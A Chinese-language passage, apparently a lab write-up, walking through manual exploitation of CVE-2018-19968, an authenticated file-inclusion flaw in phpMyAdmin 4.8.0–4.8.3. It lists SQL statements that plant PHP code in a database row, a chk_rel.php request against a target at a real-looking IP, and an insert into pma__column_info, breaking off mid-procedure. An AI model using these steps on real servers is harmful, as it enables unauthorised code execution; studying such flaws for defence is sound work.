phpMyAdmin Transformation 任意文件包含漏洞 (需登录PMASA-2018-6/CVE-2018-19968)
2018年12月07日 phpMyAdmin 发布安全公告PMASA-2018-6修复了一个由Transformation特性引起的本地文件读取漏洞,影响4.8.0~4.8.3版本,CVE编号CVE-2018-19968。
这是一个需要登陆利用的漏洞,首先需要实现登陆,在已只用户名和密码的情况下我们先登陆查看查看网页情况,先实现手工注入再编写exp脚本,我们实验的是一个已经搭建好的靶机地址为:
登陆后查看
第一步:创建数据库并将PHP代码写入SESSION文件中
可以看见后台已经有很多创建的数据库了,咱们也来创建数据库点击SQL输入代码
CREATE DATABASE shanhe;
CREATE TABLE shanhe.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO shenhe.bar SELECT '<?php phpinfo(); ?>';
这里建议是使用个性化的数据库名,并且即用即删,相同的库名会导致一些错误,执行SQL语句后我们来看:
第二步:访问网页生产配置表
已经存在我们创建的数据库了,访问如下连接数据库shanhe中生成phpMyAdmin
的配置表,得到如下结果即为成功
http://94.191.112.225/phpmyadmin/chk_rel.php?fixall_pmadb=1&db=shanhe
第三步:将篡改后的Transformation数据插入表pma__column_info
中
点击SQL
输入如下sql语句,注意要把数据库名改为自己创建的数据库名
INSERT INTO `pma__column_info`SELECT '1', 'shanhe', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop'